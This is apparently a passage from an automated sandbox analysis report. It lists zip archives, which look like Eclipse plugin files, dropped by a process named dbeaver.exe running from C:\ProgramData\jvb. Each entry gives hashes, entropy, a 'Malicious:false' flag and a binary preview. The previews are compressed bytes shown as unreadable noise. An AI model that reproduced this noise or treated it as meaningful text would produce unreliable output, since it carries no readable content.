....*.w.w..Ody..1.O...a...B....9....J..f.l...o..baM....v..Y...:.q....y.X.U.....o.....XAL..M...1.Y.......,.&.f.T.....&B..[w...8j.K.T;....J..o\TmD...._d.Lej...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):12432
      Entropy (8bit):7.772939608814317
      Encrypted:false
      SSDEEP:
      MD5:83E10B6D6E9FD752FB3D19D77728A06F
      SHA1:8EFDD20D971FF848D821746C18BA4834DB9A2CD8
      SHA-256:95FF8C61AFA14E50149F756F374DD5378349E3FEE3F69DD0C970638928986848
      SHA-512:1C6C6769188AA1E9FC8EC70804BF116EEE633D9F0C63E5B7F07DBBC5F98690FAB398CCCA304414591646024C785557CF5E974C8C0321BDF2CFEAC71A5CB63735
      Malicious:false
      Reputation:unknown
      Preview:PK........S.^W................META-INF/MANIFEST.MF}.]o.8...#.? ..v....#....(-..i.L.{e.....Ia~...(.[.].s...ys....A*.;..x.o..1.....j......!k...Y...B]..m..j....r ...8.h....<#.s....o............5O..{.........Q..|W.e-o Y.%.4z.D.A...C...s.....s...;.Z.\..4.....!....5v.t4.9..3.,..:..).n.d%.<;H..3\.`b].3..'..V..S.V5.....B...^2...iR....V!...K..?...z....4...e-1..H...[,.F8.......1!..X_..V.m..FC.....Or..@.D..H.z_..z*s.t.....4....1*.O.Gb-8-...]..&.. ..!...~C...1...e..s\....>....].[+...:.. .*.6.]..o.4..G..&....9Ns.%S.....K].k..k..K;.{.m.a/..~.m..q.....]0[..,..?.]..c,./..]..G.\ .`)M#..Y^.k.Y....&?...q._...y.W.yq..l...i4...A.W..7/r.a..y.P....D?].W..b..A..o.._.o.Kj.D8_.h..3*...].O.v.1.W{.F.n....p.'s._...."p.n..?..n....f.C!... ..Ob..d.'.j:.."O..*n.....cg..Y...w......?PK...j{.....'...PK........S.^W................META-INF/ECLIPSE_.SFu.Ks.@...V..X..#..U. ...."$.k..@7v7....lR3...Y|..' ."YqP#..0:S.4..8 .g....m.=M..v..R.b.Y)IU..v.....#uN0.......3...?g5gS..8.e.~zY
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):15473
      Entropy (8bit):7.857144861758727
      Encrypted:false
      SSDEEP:
      MD5:95A1288D77EAD91B8064E59799D0B3A0
      SHA1:F68FC32F277A74EB4A46042630CCC28A2152F098
      SHA-256:F6DD0FDC8690BE85BE798DE535E6426C318A01BA160F4D8D0CD50FD4A89B8C0B
      SHA-512:C5AB366F515CB6D6D1BE0189E8D5529ACCFF3AF5ABEE35329E3706D765B2F1EB3614290A9CCB20C5AACAC5EE497D70E35197530B8E3BBC5339A6851D663064DF
      Malicious:false
      Reputation:unknown
      Preview:PK..........qV................META-INF/MANIFEST.MF.SKs.8..S..pQ...._`.1.....BB.I6...d.....d...#......aov?.Gwk.r..!.'.....l.j......O...B..Z.qB+.Z.......D_.W=,..6...$.}u.<Cv.[....Y.eL...y..0^.8.(..C..a..#..xM.9......7.........p...o.. ....U...ku{V.vu..K..]I9...pY...r.g.K_[...3.v=...K}..+..'`...*...w>W.[.....81.....s...rQ.u..T.Q...U1..GU.{...}._j.._.?(%..l..b.<..7..5a=d%.p.[.J.._.8.c*.D.B.....220....^.Hn....s..-V...Q.d2.4..K%..D...N[.=...aF...C.=..@..K......`c.[.8`[...v.."VJ#.Y.n..@....%..E...E..Q..C7.hS-.Gg...Y`nMepH.%.h.......o.Mp..'.."S73A...W..N...i..{M.....E.......7......vY..^..^l....;1.*.K.?.>.lz.C...........}..w.='..;.;.-.E.........9-..........Lnf...'....u.;...0Yo.<.b......W.2...........TwY....u..~.>..;.d..u.z'..PK..k...........PK..........qV................META-INF/ECLIPSE_.SF..I..P...&.......D...^ ....%.....^........ImLW.w''7.I....%.. ....ESA....E@.@..n].5.:.~...b..3o1.....E.).Gci.K@..&..]..A.3.jK..h8.4..&\.F...\..&..1..v..[L. .L..L9.t*L.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):7460
      Entropy (8bit):7.041068998590347
      Encrypted:false
      SSDEEP:
      MD5:83995E613FE03664EDE84A47ED8C792A
      SHA1:CFEAC8E645966C4DBB9A9371B0DCC4D175209450
      SHA-256:9009CB3137131B50A1256A4147EE1F0D5A899CB89CEED849D1905836DD441F01
      SHA-512:BF1FDF23AC523B8E8E45044596D5C6220E13A94D4E68CF91F17818FCA527220236C7EE5A99FEDB8977C3976BC657EF59F6A5E96AF1621B82C8B222DE89FDA635
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX............@...org/eclipse/e4/ui/workbench/addons/minmax/messages_ja.propertiesU.Qk.0....+..R_..M.n.a.@aCP.I.$.jX..4e.~...Y|9...sON....F-.W..1j..#....F..%....1..t.(...x#.....L..Z.;C......{..#..8`..q.f.8e...)..:0.].....o.R.Z.4'.$.U....Q=...X.D.o@.)aI.....j:4f..HC.Prm..|...|&....$^..[.m+...v0J.,..!.RZ...ic..g....'....4M.U8....9T..&D......a2...u~..&w....Z...!iszW./....>......3.c+!..U.2.I....PK.....:B...+...PK........k.cX................plugin_ja.propertiesuN...0....'..@.x.....,...T.Q."..(...l...n!.....].....R..../..`,%......8f2!.m..y`y...t...m......T.*..r..^.u..L.Sx.....u..O!....A.p.T.....U.)......PK....*........PK........k.cX................plugin_it.properties..1.. ....W4q.]......!..*.{.o..v.!..~@qu@.....$m...Q..k.......!...BO:Q.Wp..|]....PK..;.[.U...\...PK........k.cX............@...org/eclipse/e4/ui/workbench/addons/minmax/messages_it.propertiesM.M..@..........Ov.C.&]c.W.Zwev...}.^.........01...rR.......r..~.<.:.a.$..abT....q.l...&.z>2.<..$..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):123289
      Entropy (8bit):7.942520759946143
      Encrypted:false
      SSDEEP:
      MD5:8263ACA29ED3E68C7CF3452E9B7EE437
      SHA1:27E80DD64363C73C7E7C3D3856210EEE7DB92B4B
      SHA-256:4424F3FDBB418F653CB59B658C1070AD720042418F5EB5710C89548397C7A093
      SHA-512:A9369DF075A349A82294687ACEAF1AB7FA666C1AFF03C1A4C4BE78F338A36671B64F1B208F8CAB66531AD427ADAC99C6530B9B5CB0AEF8CCDA0A819F1BC1729D
      Malicious:false
      Reputation:unknown
      Preview:PK.........fW................META-INF/MANIFEST.MF.XYo.Z.~....Ew.F....Z...l0...3.W^....._?....t:..C..:_m_U!j...Y...4s....k..7..h90....;Q+Ax.K..)AzG..6v{./..|.L.A.....]h..A...E%..|...w.....(....8.m@...}.RO..a.5.....o..Z>......]Z..}g..6....Gq..P...Q......~a9a.p.!4.....J...o....N..O...oo$..N..N....D&._.....'.....=4..d.(.._..*....... .5..............g^...3.....C...@M.Bo...<..c.'....cZ.K0.g..t..h3Mf..M6...[.w.....E..jj...a...E....S^..5.1......?.R#...g.`.?7...}^..a./i.#.M..F..:..N......;A+5.{8..;.SQ,.j.$.k......(.....i.,.W.4..Z.F...o..........=.uB.4...D.N.w...%....kR..`S.?.F..u..f...~....._..d.g P.I.x.........>.."~z.V=..C........Y...o._....P>p.@..H..BMWH9....=C...........$.d......gP.7."...>........>....9*R.H`..(...x......v...#...v.C......b_..Q..V..{~.\.E..Zn..?.X...,.."...k..{..euP....=pr..N...A.......u...~O.A..i.6.;.......<cG.....r;r..yN....^.....e.7...S...X.}?..T.....|...Z..<..q..Ud.z..*sk..^..S..$."7O.(...:.&.N.-......7.#.....Y..w.......8ukH
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):11166
      Entropy (8bit):6.8731165434593775
      Encrypted:false
      SSDEEP:
      MD5:22B9B07E9F3F79F1002B931B6B7307E3
      SHA1:F163A2ECA0FE86AF1B7643DF370CD4B6C1B563C7
      SHA-256:379AC90D2E75865B639EAB11737BF82153C3ACF6A241FC897611C2B3C8A5A908
      SHA-512:CDE1B55B24A9D26EC5C1FDE252431CD502A91257C21588CEE46535C25C82E7D521464E625C61E8B5BE724D70F94AE4CA979F8624525737D1FBB8DAC97A43C6CB
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_it.properties..1.. ....W4q.]......!..*.{.o..v.!..~@qu@.....$m...Q..k.......!...BO:Q.Wp..|]....PK..;.[.U...\...PK........j.cX............@...org/eclipse/e4/ui/workbench/renderers/swt/messages_it.propertiesu....@..{.bA.Lz%M...I/{....r..6.....,...L.lUcX.\..s%/.4..D..@..vm[....Oq+hDC{.DR.:r..}".P.kD.$..>.].\.....w..r...x.@.*hFH..."[..PK..............PK........j.cX............I...org/eclipse/e4/ui/internal/workbench/renderers/swt/messages_it.propertiesE.1..0....@...J..,n.I=..k.r.%..V.....w..K..D..a....V.Ms..."D.r6&..<..T..\.3....,hG..=.(w.X..2....C...........}.4.m....PK...M?f{.......PK........j.cX................plugin_es.properties%...1..P.W4....."X...n.fW.[..'..C.=..p.6L..@.V...V7.....:3,....!q.8.i.'..v.lY..W>.&6ycR.......k...._?^.....PK......n...~...PK........j.cX............@...org/eclipse/e4/ui/workbench/renderers/swt/messages_es.properties..N.0........x.A.\.9!....WZ...N$......e`r.....S+.S....f.+...N..Q{".h,eyl....>M.. ...N$.X.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):262723
      Entropy (8bit):7.958455165274901
      Encrypted:false
      SSDEEP:
      MD5:E3AE2A409B39A9EC95D95C4060EB72C8
      SHA1:7553E9151E8BAC436A478ABF3BBF075034734CC6
      SHA-256:5308F4AA69B24B25B776388ED19062C98AE48D914CF878C16BEBCA476C9CC34F
      SHA-512:B39EF2080F4F272B32F744F1852E48C76099BFF63305720B29C81379AA965E33C306EB99F59C311BFCFC1EB5944C5E4F5A3C9FFEE56D0B7A8C388216131D5CB9
      Malicious:false
      Reputation:unknown
      Preview:PK........\.^W................META-INF/MANIFEST.MF.ZY..Z..OU.C*...W.Q..Ru..DP...\|..2.......t'..m.U.....y.`$.....). M.|.G...L...c?L./...q.Ota.A.....>.?~..Ad?pv. g.5l#...;r..'.."....6.(..F.|...... +.....`tJ..t....Nb;. aT...e.x.S......|...y..|.4....A......P........3.'.j/H......iq..H.`8..|j.Q......._n.......U.W.&(.$v...'.h.y.p.....}7..W.Qv...}.F.....e......pF.S4..7....J.j...........X...I.n.~.?Av..Y..^..?t.#....;....=G.._..../......=.|.. ...8.....I}g.ql$.{.5.g..=x.....+...9mV8.Y....!^..,.3....z?..3.I.Y....d##t..z.....-...u...N.*....+...W..I.=..9....fm...hX....AR9EbDW.Z...gS.../.>....Eo......g.o..y.a.R.@....S<....h...K...)|....w.?,..8..QT..H.........!]@..O..}i../qV.Z..XyF...sN.9CQz....K..l.. i.M.U...[.Bj.....Eg0...9....:..]2./.J+.................'..d?d.Q.iq~.A.?;.:l.........;.....}.Z.....R......9..........Ab..6i.(l.m.Al.vI.8.G.q.1.........t0...g..j..t...G........./....#+2.!^d.~@...4..2....e..QB.=i{e[.'H........p9F.-...v.&.I.z.>X.~z..t0Uy.&. .S.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):15652
      Entropy (8bit):7.447925917984096
      Encrypted:false
      SSDEEP:
      MD5:486FB3227B9DDC1EE34F2DBCED1A0DF1
      SHA1:ACCE6771BD69023F8516FC83CB12D95A92CDF7F3
      SHA-256:ADECA9EE7ECCFAEF27CA16F3B6A130C0B463E4B7AF41DA17D2979F36F84AD0C1
      SHA-512:870D763905500AEB40100FA279E96EE64FC9DC1CF8B9956D7F79CFC13468AE124903A60C4A1D0BC155007D063EEA203A6DB6A829CD0F839BD7039DC43D665624
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ko.propertiesSVp./.,.L.(QH.T.M.TH..+).L*-./*.V(NMU.())...OJLJ..KM..,(N../J..*.)M...K.M.u..+..(.&.[..I.dS if.f..(...p...e...!k......PK...p9.y.......PK........k.cX............D...org/eclipse/e4/ui/workbench/swt/internal/copy/messages_ko.properties.V.n.0...+.....iQ-.........R....m!*eHr.....%..4@}.,{93..K.Cp].WU>.5A..~*....M.g....OAmL0k.....Le..0P...\...rp.....~.....GS.jj.F.-8wW.....- R.S.I..$R......{n...?^.W[..[...FE....q....\.-oL...*p.J]..0t...(A....m.....wxQ..".x5....Ma....L1."...C.[..&.W.8D@.yf1......@.....T..r..".%Mhi..&.".7+a.9...1.Z...J.W...0&.R...x..].4....3.......ei.q......~...T..v.,..z..<*.......Q..z2.k..DM..R'.....r....Y.<.4.L|s.c'......Q..^...mi........H.1...h=!.^...ZY[6.%...n.k.B./....y.n@AL.J.p.o(..?(hk@.........-Fg.{L...7Qr..0.ot|H..d.6...?$..Rv. z-$1...7.k..<..&d)`.q..a..m..b........1.......BQ..Y.!R0..,E.qs..X..I.W....0....v..Iu..Z.....e.......S.Ar.s.n..Qrz...v.4*r..dx\.....d|p>.`.3...*..sdos........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):153895
      Entropy (8bit):7.900855850108182
      Encrypted:false
      SSDEEP:
      MD5:D60E50DD151E8249FD66058A385D6185
      SHA1:25EDC2AACD6A81BC8A9A5C0C857FF89E32EDA7D4
      SHA-256:9305BC25C28D6D4B6FF9F97AA71DF06B49BB1DA1781B237B203968C742F1351B
      SHA-512:A8CD245675EBAB126DC5B86673FEE845E3BFD01568ED811EC7ADFBE169A4B55E85D64F8CEDE44BBA009002336DDD50E13A5D093BC8F1F04DD5059B152F0DC69C
      Malicious:false
      Reputation:unknown
      Preview:PK........Z.^W................META-INF/MANIFEST.MF.zY..X..}E........UQ'>FePP..s..3..2.......v..W{.ke....\L.4.zXzE.e../.....)<.........j...U8a.x..t0...?.u.....?h..t..Y.&.....I..v..Y.93k.}.....s.(/.....hp...R'....[..A.U...UQ{/T^.C... .4h..Aa......_.>...yR.Q..xE"u...WdM.z..r.XIt..3...//).....w.<@.V^.Z...V...N}.....O.o_G...H..N...4....[w|h...W..#.j.....&r........:.....c.~.......E.09...z.:F.^..FV...D..C...'.(u.r.......#Wx.tL..G.g1.7w...G.....).Z_v........k.zg...NQ.=...o{:.%;....l.:.l._...{.o.t....`.gvnt.|.Ww.^+bP....U..............K..........:..w..N.mFF..{.(u..R..!:J.....w..W.y..K..d....K..>....}..r...s..F:.."...X.3E.gK.YT.Q.\4.;.Hr..w1.DUWV.2x..e.o_.(.2........y.....B......<1...]..............\.S...M......\..zN...&*.t.q..E..K.....yVT....Vp1K_N.......s...M...V<.u;...nE.8k.......+/..%);J]T.V....$~^.Xuo...o.KK.]..]...q.p.....q...;J.c;Y~.Y....._}...A.C.O..(].p...?......b......Yu..o?2".G._.SN{^..[...f%.j.k..{....t..5..R...r...]...U..2..@....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):23769
      Entropy (8bit):7.873264626626665
      Encrypted:false
      SSDEEP:
      MD5:AB30A0BA9BF70DA4C6E1452D20BA862E
      SHA1:F639CA6529EF901EA4E5FF7EAE7094DB903B8DEC
      SHA-256:B95D6D8DE537E2362D3EA13148E7EA177C1997B88C5CF43ACC556EC8D71E7228
      SHA-512:F412C4308DF5A5BD06EF13A1B30361A28D35FD90916C1617DBCBE2734739CD72DEFB5981B60D9D4287C0A4DA9AC3717878C17CF0258DA65043CA46CDC1E91551
      Malicious:false
      Reputation:unknown
      Preview:PK.........YW................META-INF/MANIFEST.MF.T[s.8.}g...dv.v.ma|.d.`........,.[.[d........mg.,..9G.|..0&[.1n.iF...h.^.Q...8..6..qC.( ...6..z..I.qCo.9)F.L=..^...+.R...2r.....p..P..($i.y,.9....8FA.6#..bV................v..2...7....i..$>.......j4)...wU;A0$_ {Q9./.9~......Q~Z1..B.8.1.6....;e.;.~.Z....$....=S.gcw7..y...$....z.q..=8;........7-Z.l.$c...._...b..1#...*.wPQ......4...B.........\T....4..Q..kz..j...._z...R).+.....9.bZUp.md(...u...+..8..S..+....m.z...%..NB..6.,..9.......-..].F...V....S....;....eO.[.... Que..nU.u......Q.z.^.......52.%2aQ.'.Y..9.).B.UI:......_..6.x3.>|Q..g/..M.2.)n..J.t.'.N...Ez.w..^T_.....]..}..,....U.....D.{?~Z....BA....N....>`Q.3...N........X....SOH..=..a0.2x..7.q~.9.z..... .^...........x.2.....@..V.x&...Jm.i.....t7..9.b.gAr5..Z.\8...R*$...86}.2.z........e.....&..{....\..._..Y2..O.%%...g0.=jS..??.|..2.? .7.>b..D...m.$}.G..\:n.<.>........~......mr..g:.X...}.9.v..;@.u......l*Ho.\.A....;0....k...?.....H.@...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):276775
      Entropy (8bit):7.898693372195612
      Encrypted:false
      SSDEEP:
      MD5:1817B612C04E8F9D4EB158AF8C55D5CD
      SHA1:0B199A02713B1C9842B9441F9915D9FE4A106756
      SHA-256:748AF27619BBBF4D9B74259D4F2C73FE3E8C1A18711B8DF14DD5CC282A981881
      SHA-512:D16A8548B0F7D491627ED815E83E726F504F61E12959CED2F8370F02A102F4F17361D867FF8E93125ED53B26E3473EAEF5A689EAC0FDB6A5D5A4D046734BDA35
      Malicious:false
      Reputation:unknown
      Preview:PK........Y.^W................META-INF/MANIFEST.MF.|is.V...T.;dR..=).....T.J,..U.B.b...b_....n...r[..........z..<....d.u.........?Qu......Et. .e]{q.../......'.K2...O?ie.....o......9_.\.\..[d.'9..._.:z..,)..!@...a(...r/..I.(..y..m../3........./...C..i....OK..2.$.~y5E....Z]..._]......>..4....:..t.[...?.^=..4].D.............6A.'^.|7.z .A...:x.g.'."o..}=.:.3..a~......=..........._..{..@...~....y.7.C..*.-..p..86v.(.z.<.<rq]..a.#.....:.....g.n....[...p<_.\i.j...-..D.A.H.w.0..Pwy....._._..E..^...\uqV..L/..E.g...w1y..E~...._vN.h...3cY..'..R'zS'.Y...y......:.5...._.F...&.<...]W.....g.....ub.........y.WWg.xp.rf.#..>.....]..y&.........7Y....U..O..=A...L..?+.....3|.>...g........e..w.3}s.#......]..C....O...}..sY..'k[..'m.w.z...z...)...PO..r..*f.|d./.1c{..GU..Y....L..W...&8...O.....n...h.gb..QW.{&J...b.'.^.......r.y}....}\../(...?.g..|k...5...N..WJ.&z.......~.o..q...L.~..S:n.%.m.S<"......&...3..........y........y^...=.....|.....+...{=w..O.R.sE
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):57027
      Entropy (8bit):7.577912717224437
      Encrypted:false
      SSDEEP:
      MD5:BE6F58604A9B1C0CF7E0D85E5DA6C099
      SHA1:C6A869699BCCB4C5E430F331E5C11DBF6362B2D1
      SHA-256:D179C269610FAFC0D9A280AAC6949290219E2B8FFD9D56CA0F832BC9FBCF247E
      SHA-512:4A2217839A26D0A3F3DC51CFF9F0EA922C0052B95A383A04F7BB4EB4DF0FAF1D047F86774EDC1DDCDEBE9C8A508F46C7BC5D74BC0E9A6B583E68F587746E56D0
      Malicious:false
      Reputation:unknown
      Preview:PK..........tW................META-INF/MANIFEST.MF.ZWs.\...L..'3....Qoy'..H.U.(.J.!T6.._...8.....n.....<...../.G...d...!...8.....G........]T...6$.../.*J...?....!..2/...3_.D_.)N.....CR.Q6..O.....$r...<..n........(.......-.,.?.G.(.?..J.:e.>...^..:.U.+Jb......(.b0...0...X..j.....FY...&`....;..y.C...;c.>..(9..(.....|....p.$:.W<#}...P..U......b..Q.....s.N...GdH.b....G.qc'.H...b~|#......._.<..~..nR...]....mX.7.............}6.....^A...8n...s.".|RVF.'7.~^G..vS...}....~..b..gC..W.(....i......*...3.......x..es.QQ.*........;|....!..k...a^.JN...l.'....a....<...^b.82...}..i..........'...<.m=|i}.K..N.J.......=C...3......+..P............~.....,..!...z...9.%...??G.//..C...Q@7c........}..={YT...t..D...Q.#.....I.Ai....... .B3..WyV.>......zx......z...DY...Y%E...i.X.Z.?t..?$...^._...=.r.'.....L..o.....\.e..';.....)..t.&NQ|.b..G. .'Q.'......Si.3....V.....su9.G.$..@]Qq...N..O.O".".!...#D...H>m..n.{n...j..R.QV....o..6M.<1F....L..3:..=....ahdq.RV...S
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):69347
      Entropy (8bit):7.877922076223652
      Encrypted:false
      SSDEEP:
      MD5:AF288AFBF037EDA5FF58896B3320E467
      SHA1:DF6DD3D6D95D1D58C33C267605A7D7B675F02F19
      SHA-256:F8068C25A072621090DFEEC526268A5CE7F1EAA49B3CD2C7F50687E6799F20FE
      SHA-512:341BE2BF62A80DD2B5D0CA78DE7456C431D7FB1D2B25AF48DA1EDCAC7902E95B351D82B3E7316535857B00B00A9B2661B59469FCEFF3050E299CF2C973802E6F
      Malicious:false
      Reputation:unknown
      Preview:PK........5%.V................META-INF/MANIFEST.MF.X..\...~....b._YE....@EpC....(p.M....y.y.9.UVoV..7....2.|.'aj......i....A......9pZ|...%..\j.A........".....[Z.l..8..;!hM_0..........?.......o..:.`.....zm`.A.......y..Y.{!...S..h9W.02..nM.S\9n.\...Qm.o...I..I..............q.....6L...}]q.@....r..w...?b....$.%.B......<.Zn..C...J`....../b.........M../..Y....fA.............YI...U...u.^.V...R..*`....2Ha.!...l..6h.....v.0.v..2.A..V...$.6..y......C+.W.)......o._M_.C....n....S.,H.@'_.?.z..u...[...a.R.E0~...z...........)..,O....yLA..s....%..w....=.Q9W%..!..c.TvX8..../Uw...S...%..i.!..C.ls..,1m..|.0A..K.ST..~.......9.}q]l..O...L\.hrF..j..Z...G.=.*.!=.4.'TRou.."...\...F.52;z...........S..=.0..)..#...@.cW.b.....11s......t./.g....<Q.1I.I....g.iY...z...v..M.....{.k.>....%.....V./.7Z..<5.... .?}9."C.8...MyKG.<3.@..........{..9U....B...Q...K....P[.F\..0.~.s........^..s7.g.......r..<..../..t......(....6.=..t[.u..":...+.t..&...M..*.......n.&I.wn`Z!...Eu...1.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):25381
      Entropy (8bit):7.851350566263259
      Encrypted:false
      SSDEEP:
      MD5:B1ED412BF14B8CDC14605D83D83DF488
      SHA1:2B03CF541278807C288A21B619AB1D4A27272DCE
      SHA-256:22AE49ADF58B1603EAFD5E570B4357EAFF4FBE5FC1ECB6D7D5E55FA8FB7D314F
      SHA-512:28E8F442E8658DC8E29045FB7742BBF1F3EA5BBDF69283D987B9D4DB8E76A18A8D19303AC7ECEA33157BD753D6193C43086301B1E28DFD830A8E487F07014D2A
      Malicious:false
      Reputation:unknown
      Preview:PK.........%.V................META-INF/MANIFEST.MF.W]o.8.}G.?D.V..8!|.R...-.......'...!.3....~..M.@?...PJ.......}.K"..'"..5..2..3A.$S..lh}...........*.Z1....t..B....~cS....gFieC.....G...e..S6...)./.......M.-........C..i....f.K}".f...3)C.D...E..QV.N#.<...R...%.......8.yp....*D...U..%.i..U..J.8...;.+P......mG.$....aA|.Zf..WL..v....Y..P.Y....%N..b..8..X...*.6h}=....d.J.i4..)..2...2.:..M.......B........p...B..>...{..8.......M.{..Q.#._k9....E!.-..6v..L[X..9.....5..p,g.CCx.5.....)..v`JI.Fs.R........)...@C..3~.H`Z......f.A.g8`:..Z......bz..U2o..S..x...@.'..&..O.}$8.}....>A./00.....}..Y"....2N.Rxt r..lR..FG...{\`...}..........\...]..........o..].VLu..VOy.e.........z...[.....:..*w.x.Q....\.s....SUo.""...u...A....2m^.-...T...i..h.P......Bg..>..t....N5.?Si<j..._..h.W?{...G.=.7876.".o...HG<...%..a0.."'hxT6.G.......z..K..56.r.o.6.=..u....Y..*n7.i..B..<:.Rm.......T5fT...2.a.T..[u.ybU.dRv..WM.TQ.|..jV..K..Y.}..Bm.O.!.6.k...v5X.S..y.Hi....b.T.9?}.a. ...t.M..u.'.I.x
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):87018
      Entropy (8bit):7.890947351169496
      Encrypted:false
      SSDEEP:
      MD5:FB3890D446A9C6A3FBFB1944767FE100
      SHA1:1EAF474FD048B50B276A08DA0C65444052A76CB1
      SHA-256:A93F565185404B77013B662D26F85C024EA58330A0D82A08F15BC793814C06FD
      SHA-512:C7B615DB450A0936D9BACDB22CBE9FE6CBB6E19F63FDF3204893E4E21601D49264EAA99EB231E2AD482C82D2F9B8477C752E2B943F490572EB8E1FBBB9C2BF98
      Malicious:false
      Reputation:unknown
      Preview:PK........l%.V................META-INF/MANIFEST.MF.YYs.\.}.U...[_?t.....V.Pq....'.. .A&._...D.1.y...k.=.=....*....x.....b...U....%_.<...8.'.F..g.@..._...|W1..d$VL.s....G.7H..d.....V..N.AOo?.;{.-C>...V..e.>@.....P.WP......*z..E...P..._..._.......lC..".'H.D.y.T,..r..;.|;..d.......~1a.m....@%|..n...p`...P...a..u"...N.<w.H..|..x0......... C....::8..7Y(......".q.D.....x.x.xP..(...<....x...~ul.zA~,...)J.$....{/.yS._.E...."....VB.W....s......B.`.@...... .T..@._.E....G...?sGHw.@G5......ah..;.#........[...p.6.o....]..B.K..w.....)...%..:W.@H_@|7x).......i..I;w....AT.....q..!}[.6.[.G.?.2..G7.....M.K1/-...&..&.N.....l...$.k}.........Q..&pV...}..2.t.f..].{.4.....|....M.22..?. ..d...Tr....a(:....T.r..x...L...u.;bh......B.%../2d.%I.I.....>.}..>..<....]#Y .i......`v...>.............I.>....'.......U.3...K\4..;.......|.=.....4...A.)H....,.....t.N......k..,n..~..W.Y.J.w...A.......5....X...~...a.Cn.H..]b?...._oTQZ..@>...K..2.~Z...~.......<..V'..6.{....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):93477
      Entropy (8bit):7.873394398329434
      Encrypted:false
      SSDEEP:
      MD5:7C6C16CA59EFDFA2B7B8E2C60E400D3A
      SHA1:BAA6C04F108409ECA48BAB84AB9674FE65543AF8
      SHA-256:06242CF0E9B514416BEF351562275F03DC690360707E20D58BE234E520797678
      SHA-512:66B77B083B4A90C02328ADEDDF08DA859DCDCF89EFCA38B380884321DAD980E7FACF4E4BE731858459785FBB0D4E658366CB1D8D407C971664DEB9F77D38FA6C
      Malicious:false
      Reputation:unknown
      Preview:PK..........tW................META-INF/MANIFEST.MF..Y......'b.C...'..(.=1.........R .....izfN8O.bf.Y.YYt.z.. .[..n...a=...&.z........w..<..H..=....2.].....D..jX.,.<...m>...Z.>..._........+....s...0qz...(.....p-..l..Y....?..,.B .Nz....#u....U.fI.b.....p...8..1..t1......0yA|Z.Y`....^..j.A..Q..>|fv.....c/....y.5.s7..[.3oVd..M.....w..U.nC.(.}.{.0.*.....~..0.L.........=..?W.......t.F.Q.Q....;.F.V.Zz0..(......Ga.ue.<..D.;.W..d.4..y.......@....o....L.,}......F..L..Y.K.7Z)H..sM.K=7.@....yp...~.0F.....=...5......-<.7L.,$.W...7-<.CKO.`:{.j...^..#...;/.X...5...z...[;.uY...........(.`lzz.......HC.Z}.?...{/.O.^.@K.W&..p.`....n..o..>23...+7..6_O.._........zi0....k..3.7..{;..i:..cmr......._..`w.......)....'.<d...C..7.O...N7.u..=....]%................7.oL.#...%......a.@.......~.<..C.L...Gqj.....H.?....W%......f...&u.&1..)..H..(r.........nc6<..(.....0W..w'..L...w..#........~k.R..,_.EM$=....".._......yt...]..+.:...."p..2...gzz..,...8Av'.......`.....v.}../.*.I..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):11853
      Entropy (8bit):7.767900087510967
      Encrypted:false
      SSDEEP:
      MD5:74F1F8FB89F5ADB02747F39BE724E7DF
      SHA1:6560005BDC5B8ED8E3BBB8CEA615138064E7E240
      SHA-256:E81D91E8EF95516B9FF68EC292A39C1618531FFD9D62077BF96B15EF6D8D0FA0
      SHA-512:687AD924D25ECAC64308CFBA2608598DB89CCDD689CB55EEE680F8FB18F4A469CD1D7D40E46D5A530C1972B9A8CF22B3B731A525820B0E335E96B1B3A352C762
      Malicious:false
      Reputation:unknown
